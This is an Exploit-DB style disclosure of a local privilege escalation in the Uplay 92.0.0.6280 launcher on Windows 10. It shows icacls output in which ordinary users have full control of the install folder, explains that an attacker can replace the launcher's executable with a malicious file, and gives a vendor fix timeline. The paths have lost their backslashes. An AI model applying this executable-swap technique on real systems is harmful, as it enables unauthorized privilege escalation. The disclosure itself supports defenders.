Uplay 92.0.0.6280 – Local Privilege Escalation
# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
# Date: 2019-08-07
# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
# Vendor Homepage: https://uplay.ubisoft.com/
# Version: 92.0.0.6280
# Tested on: Windows 10 x64
# CVE : N/A
# Vulnerability Description: "C:Program Files (x86)UbisoftUbisoft Game Launcher" has in secure permission
# that allows all BUILTIN-USER has full permission. An attacker replace the
# vulnerability execute file with malicious file.
///////////////////////
Proof of Concept
///////////////////////
C:Program Files (x86)UbisoftUbisoft Game Launcher>icacls "C:Program Files (x86)UbisoftUbisoft Game Launcher"
C:Program Files (x86)UbisoftUbisoft Game Launcher BUILTINUsers:(F)
BUILTINUsers:(OI)(CI)(IO)(F)
NT SERVICETrustedInstaller:(I)(F)
NT SERVICETrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITYSYSTEM:(I)(F)
NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F)
BUILTINAdministrators:(I)(F)
BUILTINAdministrators:(I)(OI)(CI)(IO)(F)
BUILTINUsers:(I)(RX)
BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITYALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
Vulnerability Disclosure Timeline:
==================================
07 Aug, 19 : Found Vulnerability
07 Aug, 19 : Vendor Notification
14 Aug, 19 : Vendor Response
18 Sep, 19 : Vendor Fixed
18 Sep, 19 : Vendor released new patched
https://www.exploit-db.com/exploits/47493
Gloss